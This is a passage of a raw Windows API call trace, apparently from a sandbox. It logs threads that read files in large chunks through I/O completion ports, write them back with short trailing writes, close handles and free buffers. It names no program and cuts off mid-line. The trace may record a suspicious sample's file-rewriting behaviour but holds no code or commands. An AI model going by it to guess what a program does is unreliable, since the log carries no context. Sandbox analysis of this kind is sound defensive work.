lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.896] CloseHandle (hObject=0x1c) returned 1 [0159.897] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0159.897] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.897] CloseHandle (hObject=0x1e0) returned 1 [0159.898] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2b70020) returned 1 [0159.901] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.901] CloseHandle (hObject=0x1ac) returned 1 [0159.902] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3510020) returned 1 [0159.905] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0160.003] ReadFile (in: hFile=0x1b4, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x710020) returned 1 [0160.048] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0160.048] ReadFile (in: hFile=0x1d4, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x2b70020) returned 1 [0160.090] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0160.115] ReadFile (in: hFile=0x1c, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x3510020) returned 1 [0160.362] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0160.385] WriteFile (in: hFile=0x1b4, lpBuffer=0x710124, nNumberOfBytesToWrite=0x15ff, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x710020) returned 0x0 [0160.408] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0160.408] WriteFile (in: hFile=0x1d4, lpBuffer=0x2b70124*, nNumberOfBytesToWrite=0x600a, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x2b70020) returned 1 [0160.424] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0160.424] ReadFile (in: hFile=0x198, lpBuffer=0x3ab0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x3ab0020 | out: lpBuffer=0x3ab0124*, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x3ab0020) returned 1 [0160.425] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0160.425] ReadFile (in: hFile=0x1dc, lpBuffer=0x3bd0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x3bd0020 | out: lpBuffer=0x3bd0124*, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x3bd0020) returned 1 [0160.425] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0160.425] ReadFile (in: hFile=0x1e8, lpBuffer=0x3cf0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x3cf0020 | out: lpBuffer=0x3cf0124*, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x3cf0020) returned 1 [0160.425] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0160.425] WriteFile (in: hFile=0x1f4, lpBuffer=0x3630124*, nNumberOfBytesToWrite=0x111d9, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3630020) returned 1 [0160.431] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0160.431] ReadFile (in: hFile=0x1d4, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x2b70020) returned 0x0 [0160.431] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0160.432] WriteFile (in: hFile=0x198, lpBuffer=0x3ab0124*, nNumberOfBytesToWrite=0x863f, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3ab0020 | out: lpBuffer=0x3ab0124*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3ab0020) returned 1 [0160.438] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 0 [0160.438] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0160.438] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0160.438] ReadFile (in: hFile=0x1c, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x3510020) returned 0x0 [0160.438] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0160.438] ReadFile (in: hFile=0x1f4, lpBuffer=0x3630124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x3630020) returned 0x0 [0160.438] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 0 [0160.438] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0160.438] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0160.439] ReadFile (in: hFile=0x1d0, lpBuffer=0x3750124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x3750020 | out: lpBuffer=0x3750124, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x3750020) returned 0x0 [0160.439] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0160.439] ReadFile (in: hFile=0x1c0, lpBuffer=0x3870124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x3870020 | out: lpBuffer=0x3870124, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x3870020) returned 0x0 [0160.439] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0160.439] ReadFile (in: hFile=0x1c4, lpBuffer=0x3990124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x3990020 | out: lpBuffer=0x3990124, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x3990020) returned 0x0 [0160.439] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0160.439] ReadFile (in: hFile=0x198, lpBuffer=0x3ab0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x3ab0020 | out: lpBuffer=0x3ab0124, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x3ab0020) returned 0x0 [0160.439] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0160.439] WriteFile (in: hFile=0x1b4, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x710020) returned 1 [0160.461] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0160.464] ReadFile (in: hFile=0x1dc, lpBuffer=0x3bd0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x3bd0020 | out: lpBuffer=0x3bd0124, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x3bd0020) returned 0x0 [0160.464] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0160.464] WriteFile (in: hFile=0x1c0, lpBuffer=0x3870094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3870020 | out: lpBuffer=0x3870094*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3870020) returned 1 [0160.477] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0160.483] CloseHandle (hObject=0x1d4) returned 1 [0160.524] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2b70020) returned 1 [0160.527] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0160.541] WriteFile (in: hFile=0x1dc, lpBuffer=0x3bd0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3bd0020 | out: lpBuffer=0x3bd0094*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3bd0020) returned 1 [0160.556] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0160.556] WriteFile (in: hFile=0x1f4, lpBuffer=0x2690124, nNumberOfBytesToWrite=0x18350, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x2690020) returned 0x0 [0160.571] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0168.661] ReadFile (in: hFile=0x1a4, lpBuffer=0x4010124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x4010020 | out: lpBuffer=0x4010124*, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x4010020) returned 1 [0168.661] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0168.664] WriteFile (in: hFile=0x1c0, lpBuffer=0x3a70124*, nNumberOfBytesToWrite=0x14587, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3a70020 | out: lpBuffer=0x3a70124*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3a70020) returned 1 [0168.686] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0168.690] WriteFile (in: hFile=0x1a4, lpBuffer=0x4010124*, nNumberOfBytesToWrite=0x7951, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x4010020 | out: lpBuffer=0x4010124*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x4010020) returned 1 [0168.705] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 0 [0168.705] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3950020) returned 1 [0168.705] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 0 [0168.705] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3a70020) returned 1 [0168.705] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 0 [0168.705] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3b90020) returned 1 [0168.705] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 0 [0168.705] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3cb0020) returned 1 [0168.705] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 0 [0168.705] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3dd0020) returned 1 [0168.705] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0168.705] WriteFile (in: hFile=0x1a8, lpBuffer=0x3710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3710020 | out: lpBuffer=0x3710094*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3710020) returned 1 [0168.711] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0168.713] WriteFile (in: hFile=0x1c, lpBuffer=0x3cb0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3cb0020 | out: lpBuffer=0x3cb0094*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3cb0020) returned 1 [0168.746] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0168.747] CloseHandle (hObject=0x1f0) returned 1 [0168.779] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2b70020) returned 1 [0168.782] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0168.790] ReadFile (in: hFile=0x194, lpBuffer=0x4130124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x4130020 | out: lpBuffer=0x4130124*, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x4130020) returned 1 [0168.790] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0168.791] CloseHandle (hObject=0x1c8) returned 1 [0168.821] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3b90020) returned 1 [0168.824] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0168.824] CloseHandle (hObject=0x1d4) returned 1 [0168.831] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3dd0020) returned 1 [0168.833] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0168.833] WriteFile (in: hFile=0x194, lpBuffer=0x4130124*, nNumberOfBytesToWrite=0x6595, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x4130020 | out: lpBuffer=0x4130124*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x4130020) returned 1 [0168.852] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0168.853] ReadFile (in: hFile=0x194, lpBuffer=0x4130124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x4130020 | out: lpBuffer=0x4130124, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x4130020) returned 0x0 [0168.853] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 0 [0168.853] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4130020) returned 1 [0168.853] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0168.853] WriteFile (in: hFile=0x194, lpBuffer=0x4130094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x4130020 | out: lpBuffer=0x4130094*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x4130020) returned 1 [0168.853] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0168.853] CloseHandle (hObject=0x194) returned 1 [0168.854] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x4130020) returned 1 [0168.857] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 Thread: id = 121 os_tid = 0xb0 [0148.851] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0149.195] ReadFile (in: hFile=0x194, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x2690020) returned 1 [0149.265] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0149.267] 